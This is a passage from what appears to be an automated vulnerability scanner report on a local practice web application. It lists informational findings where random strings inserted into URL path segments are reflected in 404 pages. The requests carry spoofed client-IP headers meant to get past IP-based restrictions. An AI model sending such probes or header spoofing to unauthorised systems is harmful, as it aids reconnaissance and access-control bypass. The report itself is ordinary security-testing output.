<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesz1gg64nos1/brute/help/ was not found on this server.</p>
...[SNIP]...
19.122. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/bruteduvdoner0o/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/bruteduvdoner0o/help/ was not found on this server.</p>
...[SNIP]...
19.123. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/brute/helpzdl88v16bf/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/brute/helpzdl88v16bf/ was not found on this server.</p>
...[SNIP]...
19.124. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities3i3m931b7u/brute/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities3i3m931b7u/brute/source/ was not found on this server.</p>
...[SNIP]...
19.125. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/brute4r75aody5h/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/brute4r75aody5h/source/ was not found on this server.</p>
...[SNIP]...
19.126. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/brute/sourceu25p1nv2j1/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/brute/sourceu25p1nv2j1/ was not found on this server.</p>
...[SNIP]...
19.127. http://localhost/examplewebiste/vulnerabilities/captcha/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesn620pgz7w4/captcha/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesn620pgz7w4/captcha/ was not found on this server.</p>
...[SNIP]...
19.128. http://localhost/examplewebiste/vulnerabilities/captcha/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captchaq32hr6z7c1/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captchaq32hr6z7c1/ was not found on this server.</p>
...[SNIP]...
19.129. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesaq2ua23gk9/captcha/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:02 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesaq2ua23gk9/captcha/help/ was not found on this server.</p>
...[SNIP]...
19.130. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captchaj4jfpookga/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captchaj4jfpookga/help/ was not found on this server.</p>
...[SNIP]...
19.131. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captcha/helprmbxsos2w2/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captcha/helprmbxsos2w2/ was not found on this server.</p>
...[SNIP]...
19.132. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieso6q42tizk6/captcha/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 329
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieso6q42tizk6/captcha/source/ was not found on this server.</p>
...[SNIP]...
19.133. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captchaue6h5mcaf0/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 329
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captchaue6h5mcaf0/source/ was not found on this server.</p>
...[SNIP]...
19.134. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captcha/source7qk4cukpnn/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:54 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 329
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captcha/source7qk4cukpnn/ was not found on this server.</p>
...[SNIP]...
19.135. http://localhost/examplewebiste/vulnerabilities/csp/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities5nf1phj34n/csp/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:55 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities5nf1phj34n/csp/ was not found on this server.</p>
...[SNIP]...
19.136. http://localhost/examplewebiste/vulnerabilities/csp/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp74uat060ck/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp74uat060ck/ was not found on this server.</p>
...[SNIP]...
19.137. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieslcxdiipeqo/csp/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieslcxdiipeqo/csp/help/ was not found on this server.</p>
...[SNIP]...
19.138. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp5ux2pan4kk/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp5ux2pan4kk/help/ was not found on this server.</p>
...[SNIP]...
19.139. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/helpokmdusq9nr/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/helpokmdusq9nr/ was not found on this server.</p>
...[SNIP]...
19.140. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities5cfowtwx79/csp/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:03 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities5cfowtwx79/csp/source/ was not found on this server.</p>
...[SNIP]...
19.141. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp3lzhe7x5z0/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp3lzhe7x5z0/source/ was not found on this server.</p>
...[SNIP]...
19.142. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source8k1zwymigo/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:16 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source8k1zwymigo/ was not found on this server.</p>
...[SNIP]...
19.143. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/source/jsonpx6vszqogwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:11:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/source/jsonpx6vszqogwd was not found on this server.</p>
...[SNIP]...
19.144. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistel05xs60zka/vulnerabilities/csp/source/jsonp HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistel05xs60zka/vulnerabilities/csp/source/jsonp was not found on this server.</p>
...[SNIP]...
19.145. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieslpq3awun61/csp/source/jsonp HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieslpq3awun61/csp/source/jsonp was not found on this server.</p>
...[SNIP]...
19.146. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/jsonp

